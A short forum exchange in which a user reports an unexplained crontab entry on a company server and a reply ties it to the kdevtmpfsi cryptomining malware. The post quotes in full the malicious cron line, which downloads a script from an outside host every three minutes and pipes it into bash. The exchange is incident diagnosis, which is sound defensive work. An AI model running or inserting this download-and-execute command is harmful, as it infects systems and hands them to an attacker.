I found that in the company server there is a crontab that runs with this code:
*/3 * * * * curl -sk "http://repo1.criticalnumeric.tech/kworker?time=1612899272" | bash;wget "http://repo1.criticalnumeric.tech/kworker?time=1612899272" -q -o /dev/null -O - | bash;busybox wget "http://repo1.criticalnumeric.tech/kworker?time=1612899272" -q -O - | bash
If you go to that URL it reads:
"This is official page of repository linux"
This is weird, none of our engineers added this on the crontab, which makes me think that it could be an attack.
Any thoughts?
I think that it is related to the issue on the link below. I saw similar entries appear on the result of a ps aux command on one of our servers. If you are unlucky, you will find kdevtmpfsi is now hogging all of your CPU.
kdevtmpfsi - how to find and delete that miner